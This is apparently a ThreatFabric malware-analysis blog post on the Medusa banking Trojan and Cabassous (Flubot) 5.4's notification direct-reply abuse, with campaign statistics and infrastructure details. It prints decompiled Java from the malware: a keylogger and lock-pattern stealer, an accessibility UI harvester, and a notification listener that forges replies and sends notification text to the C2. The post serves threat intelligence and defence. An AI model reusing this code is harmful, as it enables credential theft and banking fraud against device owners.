ThreatFabric analysts were able to retrieve the number of infected devices for one of the Medusa campaigns. In less then a month, this distribution approach allowed Medusa to reach more then 1500 infected devices in one botnet, masquerading as DHL.

Please note that Medusa has multiple botnets for every campaign, such as DHL or Flash Player, so we expect the numbers to be much higher and very close to what we are observing with Cabassous. At the time of writing, this side-by-side campaign is still ongoing.

After targeting Turkish financial organisations in its first period of activity in 2020, Medusa has now switched its focus to North America and Europe, which results in significant number of infected devices. Powered with multiple remote access features, Medusa poses a critical threat to financial organisations in targeted regions.

At the same time, Cabassous does not seem to have any intention of stopping its evolution. The major update that introduced DNS-tunneling through public DNS-over-HTTPS services has now been followed by a novel capability never seen before in mobile banking malware. In version 5.4 actors are able to abuse the “Notification Direct Reply” feature of Android OS while intercepting notifications, which allows them to manipulate notifications from targeted applications on victim’s device.

This blog covers Medusa banking Trojan new campaigns, gives an overview of Medusa threat actor’s backend infrastructure and describes the new capability of Cabassous and its impact on fraud risk level.

Medusa: Turkish delight with dangerous filling

First discovered by ThreatFabric analysts in July 2020, Medusa has undergone several updates of its capabilities. Although some researchers refer to Medusa as Tanglebot, differentiating them as two separate malware families that share some code similarities, ThreatFabric analysts have been tracking this family from its discovery, and believe that they are indeed the same malware family, which just received several updates and improved in its obfuscation techniques.

Medusa: a deadly gunslinger as wedding partner

The main threat posed by this Trojan lies in its semi-ATS (Automated Transfer System) capability. It is powered with an Accessibility scripting engine that allows actors to perform a set of actions on the victim’s behalf, with the help of Android Accessibility Service. Moreover, Medusa sports other dangerous features like keylogging, Accessibility event logging, and audio and video streaming - all these capabilities provide actors with almost full access to victim’s device.

By abusing Accessibility Services, Medusa is able to execute commands on any app thats is running on victims device. A command like “fillfocus” allows the malware to set the text value of any specific text box to an arbitrary value chosen by the attacker, e.g. the beneficiary of a bank transfer.

Thanks to the visibility ThreatFabric obtained on the Medusa backend panels, we were able to observe panel operator marking banking apps with the “BANK” tag, to control/log the input fields. This means that any banking app in the world is at risk to this attack, even those who do not fall within the current target list.

Keylogger

Medusa authors implemented a simple accessibility-based keylogging, allowing the bot to get access to UI events, such as clicks, text inputs and focus events of all application on the infected device. This feature allows the actors to collect much more than only user input, as it can also track actions performed on the UI and visualize the content shown in the applications. This enables the attackers to gain further insights into victim’s behavior and grants them ability to steal credentials without having to resort to the use of phishing attacks.

The code powering the keylogger (including stealing the lock pattern) is visible in following snippet (simplified for understanding convenience):

 try {
    logTimestamp = new SimpleDateFormat("MM/dd/yyyy, HH:mm:ss z", Locale.US).format(Calendar.getInstance().getTime());
    CharSequence packageName = accessibilityEvent.getPackageName();
    viewIdResourceName = "";
    logPackageName = packageName == null ? "" : accessibilityEvent.getPackageName().toString();
    worker.stealPattern(v17.getRootInActiveWindow());
} catch (Exception unused_ex) {}
try {
    logText = accessibilityEvent.getText().toString();
    viewIdResourceName = accessibilityEvent.getSource().getViewIdResourceName();
} catch (Exception unused_ex) {}

String logText = logText;
String viewIdResourceName = viewIdResourceName;

try {
    int eventType = accessibilityEvent.getEventType();
    if (eventType == 1) {
        logEventType = "click";
    }
    if (eventType == 8) {
        logEventType = "focus";
    }
    if (eventType == 16) {
        logEventType = "text";
    }
    if (eventType == 0x2000) {
       logEventType = "selchange";
    }
    v17.sendKeylog(logPackageName, logTimestamp, logEventType, logText, viewIdResourceName);
    } catch (Exception unused_ex) {}
...
public void stealPattern(AccessibilityNodeInfo arg13) {
    String text;
    if (arg13.getPackageName().equals("com.android.systemui")) {
        for (Object v0: arg13.findAccessibilityNodeInfosByViewId("com.android.systemui:id/lockPatternView")) {
            AccessibilityNodeInfo accessibilityNodeInfo = (AccessibilityNodeInfo) v0;
            JSONArray jsonArray = new JSONArray();
            int index;
            for (index = 0; index < accessibilityNodeInfo.getChildCount(); ++index) {
                if (!accessibilityNodeInfo.getChild(index).isClickable()) {
                    JSONObject logAccessibilityNodeInfo = new JSONObject();
                    Rect bounds = new Rect();
                    accessibilityNodeInfo.getChild(index).getBoundsInScreen(bounds);
                    try {
                        text = accessibilityNodeInfo.getChild(index).getText().toString();
                    } catch (Exception unused_ex) {
                        text = "";
                    }try {
                        logAccessibilityNodeInfo.put("t", bounds.top);
                        logAccessibilityNodeInfo.put("l", bounds.left);
                        logAccessibilityNodeInfo.put("b", bounds.bottom);
                        logAccessibilityNodeInfo.put("r", bounds.right);
                        logAccessibilityNodeInfo.put("k", text);
                        jsonArray.put(logAccessibilityNodeInfo);
                    } catch (JSONException unused_ex) {}
                }
            }   if (jsonArray.length() <= 0) {
                 continue;
            }
            this.sendKeylog(accessibilityNodeInfo.getPackageName().toString(), "", "pattern", jsonArray.toString(), "");
        }
    }
}

Accessibility scripting

Authors of Medusa also implemented a simple but powerful scripting engine that is able to execute a sequence of commands on the infected device. Combined with the media streaming feature, this provides the attackers with limited but powerful RAT functionalities that allow them to interact with the infected device while monitoring them at the same time.

The list of available actions is shown hereunder:

Accessibility events logging

Another rather powerful feature of Medusa banking trojan is event logging. With a special command from C2 Medusa starts to recursively collect the information about the active window starting from the root node. Information of interest is such as but not limited to:

• node bounds in screen coordinates (position of elements in the UI),
• text of the node (the text inside an element),
• whether this node is categorized as password (if the element is a field of type “password”)

Having all the data collected the actor is able to get a better understanding of the interface of different applications and therefore implement relevant scenarios for accessibility scripting feature. Moreover, it allows actor(s) to have deeper insight on the applications the victim uses and their typical usage, while also allowing TA(s) to intercept some private data.

The following snippet shows the code that collects the information of active window going through its nodes:

public static JSONObject getInfoAboutNode(AccessibilityNodeInfo node, int arg7) {
    JSONObject jsonNodeInfo = new JSONObject();
    if (node == null) {
        return jsonNodeInfo;
    }
    try {
        ...
        if (node.getText() != null) {
            jsonNodeInfo.put("t", node.getText());
        }
        if (node.getContentDescription() != null) {
            jsonNodeInfo.put("cd", node.getText());
        }
        if (node.getViewIdResourceName() != null) {
            jsonNodeInfo.put("r", node.getViewIdResourceName());
        }
        ...
        if (node.isPassword()) {
            jsonNodeInfo.put("pass", true);
        }
        ...
        if (node.isVisibleToUser()) {
            jsonNodeInfo.put("vis", true);
        }
        if (node.getChildCount() > 0) {
            JSONArray jsonChildNodeInfo = new JSONArray();
            int childCounter = 0;
            while (childCounter < node.getChildCount()) {
                AccessibilityNodeInfo childNode = node.getChild(childCounter);
                ++childCounter;
                jsonChildNodeInfo.put(WorkerAccessibilityService.getInfoAboutNode(childNode, arg7 + 1));
            }
            jsonNodeInfo.put("chi", jsonChildNodeInfo);
        }
    }
    catch (Exception unused_ex) {}

Threat actor & backend infrastructure

We have substantial evidence that indicates that the threat actor behind Medusa are from Turkey. In addition to the fact that the actor has spoken Turkish on underground forums, ThreatFabric analysts have collected IP’s, browser details, and other threat intelligence to corroborate this initial hypothesis.

The panel used by actors to control Medusa is referred to as Ankatras. ThreatFabric analysts were able to retrieve the information about FLUDHL campaign, which in only 24 days was able to infect 1784 devices.

Medusa has multiple botnets. The samples seen in side-by-side campaigns with Cabassous are identified by the actors themselves with the tags FLUVOICE, FLUFLASH and FLUDHL (possibly as a reference to the corresponding Cabassous/Flubot campaigns). All these botnets use two separate C2 backends to manage bots. The first is the fronting C2, to which bots connect to, while the second is the actual bot operator panel, used by operators to manage their different botnets.

The most recent campaigns have more botnet tags as Medusa’s TA seems to have once again switched to another region. The C2s remain the same, while the botnet tags are now “VIDEO”, “CRICKET”, “SIFIRIBNELIK” (translated from Turkish as “ZERO FAKE”), “PURO”. Based on the application names and masquerade used, we believe these campaigns to target mostly users from USA, Canada and Turkey.

Once again, it is important to note that Medusa is also a very relevant threat for organizations with mobile banking apps not on the target list, as each victim with this type of malware installed is vulnerable to on-device fraud tactics. In fact, it is able the abuse or misuse any input field of any app running on the victims device.

Cabassous in charge: it will reply for you

In late January 2022 ThreatFabric analysts discovered new version of Cabassous (Flubot) tagged “5.4”. In this version authors introduced a unique feature: Direct Reply to push notifications. Cabassous is the first banking Trojan to utilise Android Nougat Direct Reply feature while intercepting notifications: with this functionality, this malware is able to provide C2 supplied responses to notifications of targeted applications on the victim’s device.

Every minute the malware sends the statistics to the C2 about the notifications received. As a response it might receive a template string that will be used to re-create an object of intercepted notification with updated parameters, thus allowing Cabassous authors to arbitrarly change notification content. The code snippet below shows the implementation of it in latest Cabassous samples:

public void onNotificationPosted(StatusBarNotification sbn) {
    super.onNotificationPosted(sbn);
    ...
    String title = sbn.getNotification().extras.getString("android.title");
    String text = sbn.getNotification().extras.getString("android.text");
    String packageName = sbn.getPackageName();
    Long timeout = (Long) p91564b42.notificationsTimeLogger.get(packageName);
    ...
    if (v2 != null && (p91564b42.notifResponse != null && !p91564b42.notifResponse.isEmpty())) {
        try {
            if (((long) timeout) == 0 L) {
                p91564b42.notificationsTimeLogger.put(packageName, Long.valueOf(System.currentTimeMillis()));
                Integer sent2package = (Integer) p91564b42.notificationsCounter.get(packageName);
                if (sent2package == null) {
                    sent2package = (int) 0;
                }

                p91564b42.notificationsCounter.put(packageName, Integer.valueOf(((int) sent2package) + 1));
                String appName = pd8474166.getAppName(this, packageName);
                String v8 = p91564b42.notifResponse.replaceAll("%APP%", appName);
                p91564b42.notifResponse = v8;
                String v8_1 = v8.replaceAll("%TITLE%", title);
                p91564b42.notifResponse = v8_1;
                p91564b42.notifResponse = v8_1.replaceAll("%TEXT%", text);
                v2.f(this.getApplicationContext(), p91564b42.notifResponse);
            } else if (System.currentTimeMillis() - ((long) timeout) > 2000 L) {
                p91564b42.notificationsTimeLogger.put(packageName, Long.valueOf(0 L));
            }
        } catch (PendingIntent.CanceledException v1) {}
    }
    if (p7e1b9eb1.isInterceptingNotif()) {
        p53cba4f5.sendToC2("LOG,NOTIF," + title + ": " + text, Boolean.valueOf(true));
        this.cancelNotification(sbn.getKey());
    }
}

We believe that this previously unseen capability can be used by actors to sign fraudulent transactions on victim’s behalf, thus making notifications non-reliable authentication/authorization factor on an infected device. Another potential abuse of this functionality could be to respond to social applications notifications with malicious phishing links. Considering the popularity of these type of apps and the strong focus of Cabassous’ TA on distribution tactics, this could easily be the main MO behind this new Notification Direct Reply Abuse.

Conclusion

More and more actors follow Cabassous’ success in distribution tactics, appropriating masquerading techniques and using the same distribution service. Despite the fact that Medusa is not extremely widespread at the moment, we do see an increase in volume of campaigns and a sufficiently greater number of different campaigns.

At the same time, Cabassous keeps evolving, introducing new features and making another step towards being able to perform on-device fraud. This innovative feature (for banking malware) provides Cabassous’ actors with improved control over intercepted notifications.

The evolution of malware families show that 2FA techniques might be not sufficient to ensure origin of transaction. It requires deeper TI in combination with a solution that is able to detect malicious behaviour on customers devices.

How we help our customers

ThreatFabric makes it easier than it has ever been to run a secure mobile payments business. With the most advanced threat intelligence for mobile banking, financial institutions can build a risk-based mobile security strategy and use this unique knowledge to detect fraud-by-malware on the mobile devices of customers in real-time.

Together with our customers and partners, we are building an easy-to-access information system to tackle the ever growing threat of mobile malware targeting the financial sector. We especially like to thank the Cyber Defence Alliance (CDA) and FS-ISAC for collaborating and proactively sharing knowledge and information across the financial sector to fight cyber-threats.

ThreatFabric has partnerships with TIPs all over the world.

If you want to request a free trial of our MTI-feed, or want to test our own MTI portal for 30 days, feel free to contact us at: sales@threatfabric.com

If you want more information on how we detect mobile malware on mobile devices, you can directly contact us at: info@threatfabric.com

Appendix: IOC

Medusa Samples

Medusa C2

Cabassous (Flubot) Samples

Cabassous C2

Appendix: Targeted apps

Medusa.B Targets for Flu botnet tags

Please note that target differ per botnet, Flu botnet tag focus is US, ES, TR Medusa has its own tags for Canada, which contain Canadian banks as target.

Cabassous.D Targets